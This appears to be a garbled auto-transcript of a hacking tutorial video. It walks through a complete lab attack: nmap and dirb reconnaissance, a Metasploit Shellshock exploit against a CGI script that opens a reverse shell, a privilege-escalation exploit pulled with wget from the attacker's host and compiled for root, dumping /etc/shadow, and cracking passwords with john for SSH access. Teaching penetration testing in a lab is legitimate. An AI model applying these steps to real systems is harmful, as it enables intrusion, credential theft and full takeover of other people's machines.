and yesterday we'll be learning end-to-end article hacking by going after a specific system and we're learning step by step what we can do exactly to scan a device and then after which to be able to gain complete control of the entire computer system and remember kids hacking is illegal if you want to run any of these radical hacking techniques do not try it on mr hackaloy [Music] number one we'll be learning about what we can do in terms of scanning devices all right so when we scan a device we're trying to look out for vulnerabilities and it could be a server it could be a phone it could be any of these devices that you're trying to go after number two what we're trying to do here is to find a vulnerability inside the system that we can take advantage of so once we find a loophole all right we will be able to gain complete control of the device and once we're in the question mark is going to be what else can we do all right so once you're in what is it can we can do in terms of post exploitation all right what can we do to elevate our privileges to be able to gain complete control of the system to even break the password of the computer so as you can see right here on the left side we have the hacker computer all right so this is hacker and what the hacker want to do is then to be able to first scan and then loose down all of those services for example do they have a file transfer protocol server do they have a secure shell being opened up do they have a website running so that we can take advantage of those weaknesses within it and so on and so forth and once we're able to list down all of this we can get the version and then from there we can determine all right what are the different attack methods that we can go after so right here this is the place where we'll be thinking and deciding about what are the different types of attack methods that we can use then after which we can launch a target against say the website okay launch an attack against into the ftp server into secure shell whichever the case is once we have uncovered exploit to use and once we're in right here into the system right what we want to do then is to elevate our privileges so that from a normal user we now have the ability to get root access meaning that we can literally do anything we want with the device remember smash the like button and turn on notifications so that you don't get hacked so right in front of us we're in call linux and the first thing you want to do is go ahead and open up terminal and once you're on terminal what you want to do right here is to have the ability to begin scanning the device or the server or the system however you want to call it so the first thing you want to do is enter nmap so nmap is going to be the tool that we'll use to help us scan the target device so here when you enter nmap you can see all the options are available for us to scan the device to look out for all the services so literally like knocking door on the house trying to scan a house looking out for openings that we can then of course be able to jump into the house and take out for example the cash and the valuables and the jewelries right so this is exactly what we'll be doing as part of launching the attack so the first thing you want to do is to scan the ip address all the hostname all the domain name the goal is that now you have a target in mind so you can enter for example the following which is nmap and what we want to do now is to enter say 1i2 168.00114 so this is going to be target device that we're going after so in this case i can enter dash as follow by v so this is for the service version that we're going after dash capital o for the operating system version so we want to know whether it is a linux what version of linux is it if it is a windows computer what version of windows computer is it running on and then after which we want to target the ports so ports are the services that can be made available from the target device so in this case we can target say from port one all the way to six five five three five so once you're done with that hit enter and of course we asked to enter superuser do all right because it requires root privileges so enter on that enter your password hit enter and now we're scanning the device to look up for all these different services that are running on the server and now the scan is completed so right here you can see the following all right we have all this different port numbers all right followed by the protocol so in this case there could be protocols like transmission control protocol and the state is of course open and you can see at the same time what kind of service is it running on is it a file transfer protocol secure shell all right http ipp and all of that all right so all of their services as well as the version on the most right side so this is a really wonderful way to quickly identify all right all of these different services all of the different versions and once you have the version you can then determine what kind of export you want to use to go after all these different type of services so that you can have access into the system and for today's case we will be targeting on apigee and so you can see right here we have http 2.4.7 so we'll be targeting the following so as part of targeted device all we got to do is just go ahead and enter the domain name of the ip address here and you can see right here this is the directory listing so you can see all of the directories the files within it so you can always click around to do your enumeration and find out right what is going on so this is a really quick way for you to look out for all these different ways and all these different services that can be helped fd for example in this case the apogee the web server level and what we can do next is jump over to use a tool called dirb so this is a way for us to be able to look out for all the different directories that is held by the server so that we can possibly look out for some of these openings which can give us an access into the server okay so here you can see the following all right all these are different options available and you can just simply enter the following all right so here we go all these examples the irb followed by the protocol of course in this case http and of course you have the url and of course a targeted directory so all you got to do now is enter dirb okay let me go ahead and clear this enter d-i-r-b for my http and once you're done with that go ahead and hit enter and you can see right here okay we're scanning and we're looking out for some really interesting thing and as you can see we're done so all we're going to do is scroll all the way back to the top and look up for any interesting results and one of those interesting results that we want to target is the one right here okay so this is cgi bin and this is a place where we're going to target the exploits next up what we really want to do is to figure out what is really in cgi bit so all i got to do is enter dirb followed by slash cgi dash bin slash hit enter on that so we're trying to figure out are there any files within it so you can see right here we have the following all right we have the cgi bin and of course we have the hollow world dot sh so this is the area for us to target and cgi stands for common gateway interface and it is a way for the web server to interact with external content generating programs and so on and so forth so we'll be leveraging on this cgi or for us to be able to gain access into the system so what we can do now is to use a really handy tool called mad splice so you can go ahead and enter sudo msf console hit enter on that and this will start up metasploit and what we are looking out for here in this case is to look for a exploit that we can use as part targeting server so all you got to do is enter search shell shop hit enter on that and here we have several options available for us so we'll be using one of that over here so this is the one that we'll be targeting to use so it is going to be under exploit multi http apigee mod cgi bash environment execute so all we're going to do now is enter use all right followed by one and once you do that you can see the following all right so we have exploit multi http apigee mod cgi bash env exec alright so you can enter show options specify the option as part of targeting the server so all we got to do now is go ahead and take a look at the following all right so we have the header so we'll be using the http user agent header so this is all the values you want to send so here we have the set r host and of course we have the arm path and we have the target uri you have discovered so go ahead and hit enter on that and the reason why we need a reverse shell is because the hacker wants to have taken advantage of a vulnerability and they have sent the exploit as well as the payload what happened is that if they try to open up a service all right so when they open up a service so that they can then finally be able to access over into the system you realize that they'll get blocked the reason why they could get blocked is because there is a firewall right here so the firewall will be inspecting all this different traffic and of course at the same time filter out all these unnecessary ports that could be opened up or all these different services that could be open up as a result of that what the hackers want to do is once they have exploited in the system they want to force a reverse connection outwards the reason is because a lot of all these different firewalls they allow or complete outbound access all right so meaning that they do not restrict a lot of all these different outbound connectivities to the internet once you're ready in three two one hit exploit and you can see right here materpata session two open and we have the following okay that's it we are in it is game over it's as simple as that and once we're in i can enter says info and you can see the ip address the os the architecture and all of the data so quickly now what we want to do is to be able to dump out the username to passwords within the computer system so what i can do now is enter shell and see where we get all right so once we're in here i can enter who am i and you notice that we're on www dash data all right let's see whether we are going to be able to do a to cat etc shadow and this is the place where all this important information usernames and all this data are there so we are not able to do that i can enter pwd so we have preen working directory so we have fairly limited access into the system no worries i will teach you how we can elevate our privileges in the system so here we have pretty good example all right so here we have the following of 2021 0903 and we have 37292.c all right so this is the one we'll be using as part of sending and uploading into the server so that we can elevate our privileges okay so all we're going to do now is enter say torch 37 292.c okay once you're entered on that you can enter say mousepad 37292.c hit enter on that and all you got to do is just literally just copy and paste whatever you're seeing right here and go ahead and send it over into the file so save it into file and once you're done with that go ahead and close mousepad and what we can do now is jump back over into terminal right and what we can do is go back into interpreter and what we can do next is to upload the file so once we're in interpreter all we're going to do is enter upload all right followed by slash loyalian desktop slash 37292.c hit enter on that and see the following operation fail and the reason why you may be getting this is because we do not have right permission so if i go and enter shell so we're in right now so i enter pwd if i try to do say torch abc all right hit enter and that cannot touch abc permission denied so we can exit from here and now what we can do is to think about whether we can upload this file into our own server and then after which from all right target or the session that we currently have download the file and be able to run some other directories so going back into another terminal all you're going to do is enter sudo systemctl all right fold by start apogee2.service hit enter on that enter your password and this would help us start up the apigee server so that we can host our malicious file so what you can do now is go ahead and enter copy 37292 into var www.html slash hit enter on that so done we're able to now host this file over and then the target user can now download that file so what i can do now is go ahead and say cd over slash tam all right so this is a directory that's available in pretty much all of the linux servers so that we can write a temporary file in so what i can do now is go ahead do the following enter shell and to wget http 1i2 168.0.192 followed by slash all right 37292.c hit enter and that oh my are you seeing that we just downloaded the file meaning that we are now able to execute on this by doing the following okay so all we're going to do now is enter gcc37292.c and then we want to output this over to say follow ofs okay so done and next up we can do a chmod plus x to make this executable ofs done enter dot slash ofs hit enter on that guess what all right who am i we got root we're in we have complete control over the entire system so what we want to do now is to be able to break the username and passwords on the linux server yes i know this is pretty crazy stuff so what i can do now is go ahead and enter say cat etc shadow hit enter on that and we have all these different details and you can save them all up into a file alright so in this case we can save all of this into a shadow file on kala linux next up what we want to do is enter cad etc passwd hit enter on that as well and likewise we want to save this all right over into a file on kali linux so that we can do our password breaking so i've already saved up the file and you'll be able to see the following so i can do a cat shadow all right hit enter on that and we can see all right the exact same file right here and we have many interesting uses like anakin skywalker darth vader all these really interesting star wars characters so next up what we can do is likewise we can do a cam passwd all right so here same thing we're seeing all the exact same copy from the linux server over into a collection machine so what we can do next is to go ahead and enter on shadow all right followed by passwd followed by shadow and then what we can do now is i'll put it into unshadowed dot txt all right so go ahead and hit enter on that alright so done okay what we can do next is to use john john is going to be a password cracking software it will use as part of breaking into that file so what we can do now is enter john full by the word list equal all right so in this case we can enter usr share word lists follow my rockq.txt okay and then after which target the unshadow.txt and then three two one hit enter on that you can see the following okay over here it states loaded one password hash okay so all we're gonna do right now is just do the following by entering show so you can enter john show now we can enter unshadowed dot txt hit enter on that we got a following here okay so we got vagrant vagrant so here we got the username as well as the password field just like that remember earlier we had a secure shell service that's available so what we can do now is go ahead and enter ssh vargrand at 192 168.0.114 and hit enter on that now we can enter the password all right which is vanguard as well what the heck we are in we have a connection over into the linux server using a broken username and password in terms of defense it's really important and critical to always be testing scanning your different servers that you have because they could be hosting a lot of production workloads and you want to ensure that there's no misconfiguration there is no miss security patches so that all this different type of exploits cannot be easily conducted against your servers so once again i hope you learned something valuable in today's tutorial so like share subscribe and turn on notifications so that you can be kept abreast of the latest article hacking tutorials